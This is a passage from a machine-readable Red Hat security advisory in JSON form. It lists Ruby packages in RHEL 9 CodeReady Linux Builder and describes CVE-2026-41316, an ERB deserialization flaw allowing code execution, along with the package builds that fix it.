"name": "ruby-libs-0:3.0.7-166.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.s390x"
},
"product_reference": "ruby-libs-0:3.0.7-166.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-0:3.0.7-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.x86_64"
},
"product_reference": "ruby-libs-0:3.0.7-166.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.aarch64"
},
"product_reference": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.i686 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.i686"
},
"product_reference": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.i686",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.ppc64le"
},
"product_reference": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.s390x"
},
"product_reference": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.x86_64"
},
"product_reference": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-0:3.0.0-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.aarch64"
},
"product_reference": "rubygem-bigdecimal-0:3.0.0-166.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-0:3.0.0-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.ppc64le"
},
"product_reference": "rubygem-bigdecimal-0:3.0.0-166.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-0:3.0.0-166.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.s390x"
},
"product_reference": "rubygem-bigdecimal-0:3.0.0-166.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-0:3.0.0-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.x86_64"
},
"product_reference": "rubygem-bigdecimal-0:3.0.0-166.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.aarch64"
},
"product_reference": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.i686 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.i686"
},
"product_reference": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.i686",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.ppc64le"
},
"product_reference": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.s390x"
},
"product_reference": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.x86_64"
},
"product_reference": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bundler-0:2.2.33-166.el9_7.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-bundler-0:2.2.33-166.el9_7.noarch"
},
"product_reference": "rubygem-bundler-0:2.2.33-166.el9_7.noarch",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-0:0.5.7-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.aarch64"
},
"product_reference": "rubygem-io-console-0:0.5.7-166.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-0:0.5.7-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.ppc64le"
},
"product_reference": "rubygem-io-console-0:0.5.7-166.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-0:0.5.7-166.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.s390x"
},
"product_reference": "rubygem-io-console-0:0.5.7-166.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-0:0.5.7-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-io-console-0:0.5.7-166.el9_7.x86_64"
},
"product_reference": "rubygem-io-console-0:0.5.7-166.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.aarch64"
},
"product_reference": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.i686 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.i686"
},
"product_reference": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.i686",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.ppc64le"
},
"product_reference": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.s390x"
},
"product_reference": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.x86_64"
},
"product_reference": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-irb-0:1.3.5-166.el9_7.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-irb-0:1.3.5-166.el9_7.noarch"
},
"product_reference": "rubygem-irb-0:1.3.5-166.el9_7.noarch",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-0:2.5.1-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.aarch64"
},
"product_reference": "rubygem-json-0:2.5.1-166.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-0:2.5.1-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.ppc64le"
},
"product_reference": "rubygem-json-0:2.5.1-166.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-0:2.5.1-166.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.s390x"
},
"product_reference": "rubygem-json-0:2.5.1-166.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-0:2.5.1-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-json-0:2.5.1-166.el9_7.x86_64"
},
"product_reference": "rubygem-json-0:2.5.1-166.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.aarch64"
},
"product_reference": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.i686 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.i686"
},
"product_reference": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.i686",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.ppc64le"
},
"product_reference": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.s390x"
},
"product_reference": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.5.1-166.el9_7.x86_64"
},
"product_reference": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-minitest-0:5.14.2-166.el9_7.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-minitest-0:5.14.2-166.el9_7.noarch"
},
"product_reference": "rubygem-minitest-0:5.14.2-166.el9_7.noarch",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-power_assert-0:1.2.1-166.el9_7.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-power_assert-0:1.2.1-166.el9_7.noarch"
},
"product_reference": "rubygem-power_assert-0:1.2.1-166.el9_7.noarch",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-0:3.3.2-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.aarch64"
},
"product_reference": "rubygem-psych-0:3.3.2-166.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-0:3.3.2-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.ppc64le"
},
"product_reference": "rubygem-psych-0:3.3.2-166.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-0:3.3.2-166.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.s390x"
},
"product_reference": "rubygem-psych-0:3.3.2-166.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-0:3.3.2-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-psych-0:3.3.2-166.el9_7.x86_64"
},
"product_reference": "rubygem-psych-0:3.3.2-166.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.aarch64"
},
"product_reference": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.i686 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.i686"
},
"product_reference": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.i686",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.ppc64le"
},
"product_reference": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.s390x"
},
"product_reference": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:3.3.2-166.el9_7.x86_64"
},
"product_reference": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rake-0:13.0.3-166.el9_7.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-rake-0:13.0.3-166.el9_7.noarch"
},
"product_reference": "rubygem-rake-0:13.0.3-166.el9_7.noarch",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rbs-0:1.4.0-166.el9_7.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-rbs-0:1.4.0-166.el9_7.noarch"
},
"product_reference": "rubygem-rbs-0:1.4.0-166.el9_7.noarch",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rdoc-0:6.3.4.1-166.el9_7.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-rdoc-0:6.3.4.1-166.el9_7.noarch"
},
"product_reference": "rubygem-rdoc-0:6.3.4.1-166.el9_7.noarch",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rexml-0:3.2.5-166.el9_7.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-rexml-0:3.2.5-166.el9_7.noarch"
},
"product_reference": "rubygem-rexml-0:3.2.5-166.el9_7.noarch",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-rss-0:0.2.9-166.el9_7.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-rss-0:0.2.9-166.el9_7.noarch"
},
"product_reference": "rubygem-rss-0:0.2.9-166.el9_7.noarch",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-test-unit-0:3.3.7-166.el9_7.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-test-unit-0:3.3.7-166.el9_7.noarch"
},
"product_reference": "rubygem-test-unit-0:3.3.7-166.el9_7.noarch",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-typeprof-0:0.15.2-166.el9_7.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygem-typeprof-0:0.15.2-166.el9_7.noarch"
},
"product_reference": "rubygem-typeprof-0:0.15.2-166.el9_7.noarch",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygems-0:3.2.33-166.el9_7.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygems-0:3.2.33-166.el9_7.noarch"
},
"product_reference": "rubygems-0:3.2.33-166.el9_7.noarch",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygems-devel-0:3.2.33-166.el9_7.noarch as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rubygems-devel-0:3.2.33-166.el9_7.noarch"
},
"product_reference": "rubygems-devel-0:3.2.33-166.el9_7.noarch",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-41316",
"cwe": {
"id": "CWE-502",
"name": "Deserialization of Untrusted Data"
},
"discovery_date": "2026-04-24T03:01:16.620515+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2461369"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in ERB, a templating system for Ruby. An attacker who can trigger deserialization of untrusted data in a Ruby application can bypass existing protections. This vulnerability allows for arbitrary code execution by exploiting specific public methods that evaluate template source code, which were not properly guarded against deserialization attacks.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "erb: ERB: Arbitrary code execution via deserialization bypass",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.i686",
"AppStream-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.src",
"AppStream-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.i686",
"AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.i686",
"AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:ruby-default-gems-0:3.0.7-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.i686",
"AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:ruby-doc-0:3.0.7-166.el9_7.noarch",
"AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.i686",
"AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.i686",
"AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.x86_64",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.aarch64",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.i686",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.ppc64le",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.s390x",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.x86_64",
